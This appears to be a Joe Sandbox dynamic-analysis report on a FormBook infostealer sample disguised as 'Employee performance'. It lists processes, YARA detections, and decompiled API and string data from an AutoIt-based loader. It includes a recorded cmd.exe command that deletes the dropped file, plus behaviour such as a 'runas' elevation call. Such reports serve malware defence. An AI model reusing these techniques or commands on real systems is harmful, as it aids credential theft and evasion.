Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\control.exe"
Imagebase:	0x900000
File size:	149'504 bytes
MD5 hash:	EBC29AA32C57A54018089CFC9CACAFE8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	09:20:51
Start date:	05/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\SysWOW64\svchost.exe"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:20:51
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0.9%
Signature Coverage:	3.1%
Total number of Nodes:	1899
Total number of Limit Nodes:	52

Executed Functions

Function 00FD42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00FD430D

Part of subcall function 00FD6B57: _wcslen.LIBCMT ref: 00FD6B6A

GetCurrentProcess.KERNEL32(?,0106CB64,00000000,?,?), ref: 00FD4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00FD4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00FD4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FD4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00FD4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 00FD447B
GetSystemInfo.KERNEL32(?,?,?), ref: 00FD44A0

Strings

|O, xrefs: 010136F8
GetNativeSystemInfo, xrefs: 00FD4460
kernel32.dll, xrefs: 00FD444F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 3f68ab76f19d29fa15df96b9aa85d74026a89ae2d2080f6abbd35726425b6621
Instruction ID: ca300ab538dcda7dbadbaa2887573ff95459bdb70cb7c037a97528c6edc60007
Opcode Fuzzy Hash: 3f68ab76f19d29fa15df96b9aa85d74026a89ae2d2080f6abbd35726425b6621
Instruction Fuzzy Hash: 54A17E3790EAC0DFC732CF6974402997EE57B26250F88D89AD4C1ABB0ED63E4548DB61

Function 00FD42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FD50AA,?,?,00000000,00000000), ref: 00FD42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FD50AA,?,?,00000000,00000000), ref: 00FD42C9
LoadResource.KERNEL32(?,00000000,?,?,00FD50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FD4F20), ref: 010135BE
SizeofResource.KERNEL32(?,00000000,?,?,00FD50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FD4F20), ref: 010135D3
LockResource.KERNEL32(00FD50AA,?,?,00FD50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FD4F20,?), ref: 010135E6

Strings

SCRIPT, xrefs: 00FD42BF

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 779150f581d366f3b762bac67e75dbe809d34fe908aba790a38d95ecd3026e02
Instruction ID: 9a20dce47b81f62748ad2d0d4817700ed697be4a802990822c8061a239cd0dd6
Opcode Fuzzy Hash: 779150f581d366f3b762bac67e75dbe809d34fe908aba790a38d95ecd3026e02
Instruction Fuzzy Hash: 29117C71200701BFE7218B65DD48F277BBAEBC5B62F14416AF886D7254DB76E8009670

Function 01012BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00FD2B6B

Part of subcall function 00FD3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010A1418,?,00FD2E7F,?,?,?,00000000), ref: 00FD3A78

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,01092224), ref: 01012C10
ShellExecuteW.SHELL32(00000000,?,?,01092224), ref: 01012C17

Strings

runas, xrefs: 01012C0B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: b908ab97b47e6a6cb2ca58c589158988ba8ee5839529fe7ed2d66092102a2dd2
Instruction ID: 2195e01886312c64bc9bf9f35f8201d0d7d9f5d7834452a629c22947a2c6263f
Opcode Fuzzy Hash: b908ab97b47e6a6cb2ca58c589158988ba8ee5839529fe7ed2d66092102a2dd2
Instruction Fuzzy Hash: 6911D2316082016AC715FF64DD5196EBBA6ABA1750F4C041FF2C2462A2CF7D8A09B752

Function 0103DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,01015222), ref: 0103DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0103DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0103DBEE
FindClose.KERNEL32(00000000), ref: 0103DBFA

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 5636fbe5babc33fd04b1c5df193f8701aa0757787e722d7b48f6947f3cc79c62
Instruction ID: a80e2ed19f3b0f52dad72d31fde7b219afd0fb06a1e6629289c2e7c363d68361
Opcode Fuzzy Hash: 5636fbe5babc33fd04b1c5df193f8701aa0757787e722d7b48f6947f3cc79c62
Instruction Fuzzy Hash: F7F0EC7043051597A2306BBC9D0D46A77AC9E41334B404742F8F5C10F0EBB5995447D5

Function 00FDD730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00FDD807
timeGetTime.WINMM ref: 00FDDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FDDB28
TranslateMessage.USER32(?), ref: 00FDDB7B
DispatchMessageW.USER32(?), ref: 00FDDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FDDB9F
Sleep.KERNEL32(0000000A), ref: 00FDDBB1

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 28365222573f8143101d1dff2bec8b98fff1bda85042f1350c990fd4db945552
Instruction ID: 1de6216cec3ae3ca10fdb80e23ff6325f78efa3a025fc81343fa39cfd9737e23
Opcode Fuzzy Hash: 28365222573f8143101d1dff2bec8b98fff1bda85042f1350c990fd4db945552
Instruction Fuzzy Hash: AA421330608342DFD739DF24C894BAABBE2BF85314F18855AE4D587391D775E844EB82

Function 00FD2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00FD2D07
RegisterClassExW.USER32(00000030), ref: 00FD2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD2D42
InitCommonControlsEx.COMCTL32(?), ref: 00FD2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FD2D6F
LoadIconW.USER32(000000A9), ref: 00FD2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FD2D94

Strings

0, xrefs: 00FD2CE9
AutoIt v3 GUI, xrefs: 00FD2D23
+, xrefs: 00FD2CF0
TaskbarCreated, xrefs: 00FD2D37

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: aca0c8aabbff89e1949a99ae1d8d67146aae8cec6e182723749481d1882e86f7
Instruction ID: c3f78532a1c807ba05fda7af368226b56545a90e939e9de83918291335868e68
Opcode Fuzzy Hash: aca0c8aabbff89e1949a99ae1d8d67146aae8cec6e182723749481d1882e86f7
Instruction Fuzzy Hash: 632117B5D01358AFEB20DFA4E949BDDBBB8FB08700F00811AF591A6294D7BA0544CF91

Function 0101065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0101039A: CreateFileW.KERNELBASE(00000000,00000000,?,01010704,?,?,00000000,?,01010704,00000000,0000000C), ref: 010103B7

GetLastError.KERNEL32 ref: 0101076F
__dosmaperr.LIBCMT ref: 01010776
GetFileType.KERNELBASE(00000000), ref: 01010782
GetLastError.KERNEL32 ref: 0101078C
__dosmaperr.LIBCMT ref: 01010795
CloseHandle.KERNEL32(00000000), ref: 010107B5
CloseHandle.KERNEL32(?), ref: 010108FF
GetLastError.KERNEL32 ref: 01010931
__dosmaperr.LIBCMT ref: 01010938

Strings

H, xrefs: 010108BD

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 864f4027594d7c233ab582dc9384d7fb6ab44ab8f9fee991661cc61ae74a9492
Instruction ID: c046e7d17304479e691a7d271609d77846a4ff5abb0683aa099704938a0cfe78
Opcode Fuzzy Hash: 864f4027594d7c233ab582dc9384d7fb6ab44ab8f9fee991661cc61ae74a9492
Instruction Fuzzy Hash: 99A13832A041098FDF19EF68D851BAE3BE0AF06324F14419DF8D5EB2D9D7398952CB91

Function 00FD344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FD3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010A1418,?,00FD2E7F,?,?,?,00000000), ref: 00FD3A78

Part of subcall function 00FD3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FD3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FD356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0101318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 010131CE
RegCloseKey.ADVAPI32(?), ref: 01013210
_wcslen.LIBCMT ref: 01013277
_wcslen.LIBCMT ref: 01013286

Strings

\Include\, xrefs: 00FD3527
\, xrefs: 0101328C
Software\AutoIt v3\AutoIt, xrefs: 00FD3560
Include, xrefs: 01013184, 010131C5

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 02cf0d43437094069bc1a62271a0c02759cc93f51e513ca2874ed94254cddc63
Instruction ID: 18256a687bb4a9c0a6c31cf53867051ef4c9a8c7b127a713bc0eed05d661d3c7
Opcode Fuzzy Hash: 02cf0d43437094069bc1a62271a0c02759cc93f51e513ca2874ed94254cddc63
Instruction Fuzzy Hash: 9971E4724043019ED324EF69DC818ABBBE8FF86750F84843EF5C497264EB7A9548DB52

Function 00FD2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00FD2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00FD2B9D
LoadIconW.USER32(00000063), ref: 00FD2BB3
LoadIconW.USER32(000000A4), ref: 00FD2BC5
LoadIconW.USER32(000000A2), ref: 00FD2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FD2BEF
RegisterClassExW.USER32(?), ref: 00FD2C40

Part of subcall function 00FD2CD4: GetSysColorBrush.USER32(0000000F), ref: 00FD2D07
Part of subcall function 00FD2CD4: RegisterClassExW.USER32(00000030), ref: 00FD2D31
Part of subcall function 00FD2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FD2D42
Part of subcall function 00FD2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00FD2D5F
Part of subcall function 00FD2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FD2D6F
Part of subcall function 00FD2CD4: LoadIconW.USER32(000000A9), ref: 00FD2D85
Part of subcall function 00FD2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FD2D94

Strings

0, xrefs: 00FD2C0F
AutoIt v3, xrefs: 00FD2C2F
#, xrefs: 00FD2C16

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 5748b6c0cb35e84f66f941b2b17884b6edcc36b79a2f7e64fb8855132e563b45
Instruction ID: db43bd0a8cc39adac1eed36ab4823e4ee7809fb39f5c15c2a3acca650c6475ba
Opcode Fuzzy Hash: 5748b6c0cb35e84f66f941b2b17884b6edcc36b79a2f7e64fb8855132e563b45
Instruction Fuzzy Hash: AA218E76E00314AFDB209FA5E944B9D7FF5FB08B50F40801AF584A2394D3BA0540DF90

Function 00FD3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00FD316A,?,?), ref: 00FD31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,00FD316A,?,?), ref: 00FD3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FD3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00FD316A,?,?), ref: 00FD3232
CreatePopupMenu.USER32 ref: 00FD3246
PostQuitMessage.USER32(00000000), ref: 00FD3267

Strings

TaskbarCreated, xrefs: 00FD322D

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: a7781a905c0220edc4fae11d086ea3ef84c7bfc5d201ae992257bc2c964b9701
Instruction ID: b44e235fa34e885523597182ec83334bbf163cb4746656d8545beef21e235f4c
Opcode Fuzzy Hash: a7781a905c0220edc4fae11d086ea3ef84c7bfc5d201ae992257bc2c964b9701
Instruction Fuzzy Hash: 6941E437A00201AAEB246FB8DD09B793A5AF705351F5C411BF7D2C6395CA7E9A40B362

Function 01008D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a46ec675638598418803010350797025c30dd96098c629325084d7972c8dbcfc
Instruction ID: 062819872a75c00b55280d3a0eab8458b490428f348d88a42a49aed3d2cbea9d
Opcode Fuzzy Hash: a46ec675638598418803010350797025c30dd96098c629325084d7972c8dbcfc
Instruction Fuzzy Hash: EDC1BF74D04249AFEB22DFACD844BADBFB4BF09314F04419AF698A72D2C7359941CB61

Function 00F92620 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F926F1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F92917

Memory Dump Source

Source File: 00000000.00000002.1261034105.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_Employee performance.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction ID: 40abfc89c47b1bfd2910aced411e1affc7ae196dab765c5d11e4e879a6c554f6
Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction Fuzzy Hash: E5A10775E00209EBEF54CFA4C894BEEBBB5BF48314F208559E501BB280D7759A40EB95

Function 00FD2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FD2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FD2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00FD1CAD,?), ref: 00FD2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00FD1CAD,?), ref: 00FD2CCF

Strings

edit, xrefs: 00FD2CAC
AutoIt v3, xrefs: 00FD2C89, 00FD2C8E, 00FD2C8F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 6af094bf6a0cbca682249db23407bd25431b1b282bafe0ca61098e5037ad3c88
Instruction ID: a93a18b714e900f76310d983049d1f86ebff188efbb9c3ffd160354d1955f61a
